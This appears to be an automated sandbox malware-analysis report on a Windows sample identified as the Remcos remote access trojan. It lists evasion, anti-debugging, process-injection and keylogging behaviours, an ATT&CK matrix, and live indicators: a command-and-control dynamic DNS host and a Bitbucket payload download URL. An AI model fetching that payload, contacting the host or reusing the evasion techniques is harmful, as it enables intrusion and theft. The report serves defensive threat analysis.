                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 1372, type: MEMORYSTR
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 5050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6930000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 444000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 545532Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeDropped PE file which has not been started: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeDropped PE file which has not been started: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-14808
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeAPI coverage: 0.8 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3180Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3180Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4284Thread sleep count: 197 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4436Thread sleep time: -444000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3180Thread sleep time: -545532s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe TID: 6752Thread sleep count: 167 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe TID: 6752Thread sleep time: -83500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 444000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 545532Jump to behavior
                      Source: csc.exe, 00000003.00000003.2577032423.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000134A0000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drBinary or memory string: /COMPAQEMU
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009ABB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000003.2854551296.0000000009ABB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: csc.exe, 00000003.00000002.4047975688.00000000097C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeAPI call chain: ExitProcess graph end nodegraph_0-14810

                      Anti Debugging

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSystem information queried: KernelDebuggerInformationJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0041343A ___report_gsfailure,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041343A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0041343A ___report_gsfailure,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041343A
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00415AE9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00415AE9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D0000 protect: page execute and read and writeJump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQuerySystemInformation: Direct from: 0x7FF8C88ED6C4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtCreateKey: Direct from: 0x7FF8C88ED3A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtOpenSection: Direct from: 0x7FF8C88ED6E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtProtectVirtualMemory: Direct from: 0x7FF8C88EDA04Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetInformationThread: Direct from: 0x7FF8C88ED1A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetInformationFile: Direct from: 0x7FF8C88ED4E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQueryValueKey: Direct from: 0x7FF8C88ED2E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtResumeThread: Direct from: 0x7FF8C88EDA44Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQueueApcThread: Direct from: 0x7FF8C88ED8A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQueryAttributesFile: Direct from: 0x7FF8C88ED7A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtCreateFile: Direct from: 0x7FF8C88EDAA4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtOpenKeyEx: Direct from: 0x7FF8C88EF3F4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtNotifyChangeKey: Direct from: 0x7FF8C88EF314Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQuerySystemInformation: Direct from: 0x7FF8C88C4B5EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQuerySystemInformation: Direct from: 0x76EE63E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetTimerEx: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetValueKey: Direct from: 0x7FF8C88EDBF4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtEnumerateValueKey: Direct from: 0x7FF8C88ED264Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetInformationProcess: Direct from: 0x7FF8C88ED384Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtCreateThreadEx: Direct from: 0x7FF8C88EE814Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtAllocateVirtualMemory: Direct from: 0x7FF8C88ED304Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtEnumerateKey: Direct from: 0x7FF8C88ED644Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQueryInformationToken: Direct from: 0x7FF8C88ED424Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtUnmapViewOfSection: Direct from: 0x7FF8C88ED544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQueryInformationProcess: Direct from: 0x7FF8C88ED324Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtOpenFile: Direct from: 0x7FF8C88ED664Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetSecurityObject: Direct from: 0x7FF8C88F04D4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetTimerEx: Direct from: 0x7FF8C88F05D4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtOpenKey: Direct from: 0x7FF8C88ED244Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtClose: Direct from: 0x7FF8C88ED1E4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtCreateMutant: Direct from: 0x7FF8C88EE654Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtQueryVolumeInformationFile: Direct from: 0x7FF8C88ED924Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeNtMapViewOfSection: Direct from: 0x7FF8C88ED504Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeMemory written: C:\Users\user\AppData\Local\Temp\ccrdlld.exe base: D0000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D0000Jump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 69D008Jump to behavior
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045827391.0000000009AB6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [2024/12/12 12:02:45 Program Manager]
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045827391.0000000009AB6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [2024/12/12 12:02:51 Program Manager]
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd996ca
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerMJ
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managern
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagernJ
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: GetLocaleInfoW,_swscanf,0_2_0040EC80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0041C45E GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041C45E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: csc.exe, 00000003.00000003.2383707260.00000000097C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                      Source: csc.exe, 00000003.00000003.2383707260.00000000097C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation                      		11
                      Scheduled Task/Job                      		32
                      Process Injection                      		1
                      Masquerading                      		11
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services11
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Scheduled Task/Job                      		11
                      Registry Run Keys / Startup Folder                      		11
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory251
                      Security Software Discovery                      		Remote Desktop Protocol12
                      Archive Collected Data                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		251
                      Virtualization/Sandbox Evasion                      		Security Account Manager1
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                      Registry Run Keys / Startup Folder                      		32
                      Process Injection                      		NTDS251
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets134
                      System Information Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573906 Sample: 4JwhvqLe8n.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 26 s3-w.us-east-1.amazonaws.com 2->26 28 s3-1-w.amazonaws.com 2->28 30 5 other IPs or domains 2->30 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 10 other signatures 2->46 7 4JwhvqLe8n.exe 1 3 2->7         started        11 ccrdlld.exe 1 3 2->11         started        signatures3 process4 file5 20 C:\Users\user\Videos\...\OrionLegacyCLI.exe, PE32 7->20 dropped 48 Creates multiple autostart registry keys 7->48 50 Writes to foreign memory regions 7->50 52 Allocates memory in foreign processes 7->52 13 csc.exe 16 3 7->13         started        22 C:\Users\user\...\HardDiskSentinelBin.exe, PE32 11->22 dropped 54 Drops large PE files 11->54 56 Injects a PE file into a foreign processes 11->56 18 ccrdlld.exe 3 16 11->18         started        signatures6 process7 dnsIp8 32 newstaticfreepoint24.ddns-ip.net 181.131.217.244, 1842, 30203, 49743 EPMTelecomunicacionesSAESPCO Colombia 13->32 34 s3-w.us-east-1.amazonaws.com 3.5.24.44, 443, 49760 AMAZON-AESUS United States 13->34 36 bitbucket.org 185.166.143.49, 443, 49750 AMAZON-02US Germany 13->36 24 C:\Users\user\AppData\Local\...\ccrdlld.exe, PE32 13->24 dropped 58 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 13->58 38 geoplugin.net 178.237.33.50, 49850, 80 ATOM86-ASATOM86NL Netherlands 18->38 60 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->60 62 Installs a global keyboard hook 18->62 64 Found direct / indirect Syscall (likely to bypass EDR) 18->64 file9 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      4JwhvqLe8n.exe42%ReversingLabsWin32.Backdoor.Remcos

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://bbuseruploads.s3.amazonaws0%Avira URL Cloudsafe
                      http://www.hdsentinel.comU0%Avira URL Cloudsafe
                      newstaticfreepoint24.ddns-ip.net0%Avira URL Cloudsafe
                      http://www.hdsentinel.com/sendreport.phpU0%Avira URL Cloudsafe
                      http://www.hdsentinel.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-w.us-east-1.amazonaws.com
                      		3.5.24.44
                      		truefalse
                        		high
                        bitbucket.org
                        		185.166.143.49
                        		truefalse
                          		high
                          navegacionseguracol24vip.org
                          		181.131.217.244
                          		truefalse
                            		high
                            geoplugin.net
                            		178.237.33.50
                            		truefalse
                              		high
                              newstaticfreepoint24.ddns-ip.net
                              		181.131.217.244
                              		truefalse
                                		high
                                bbuseruploads.s3.amazonaws.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://geoplugin.net/json.gpfalse
                                    		high
                                    https://bitbucket.org/facturacioncol/fact/downloads/null.exefalse
                                      		high
                                      newstaticfreepoint24.ddns-ip.nettrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://geoplugin.net/json.gpnJccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.4046058134.0000000006E4B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://geoplugin.net/json.gpapJccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://stackoverflow.com/q/14436606/23354csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netJcsc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://geoplugin.net/json.gpWJccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://web-security-reports.services.atlassian.com/csp-report/bb-websitecsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/mgravell/protobuf-netcsc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.hdsentinel.comUcsc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://geoplugin.net/lrpc:ccrdlld.exe, 00000006.00000003.2854551296.0000000009AA4000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.indyproject.org/ccrdlld.exe.3.drfalse
                                                              		high
                                                              https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dz8aopenkvv6s.cloudfront.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.hdsentinel.com/sendreport.phpUcsc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://github.com/mgravell/protobuf-neticsc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
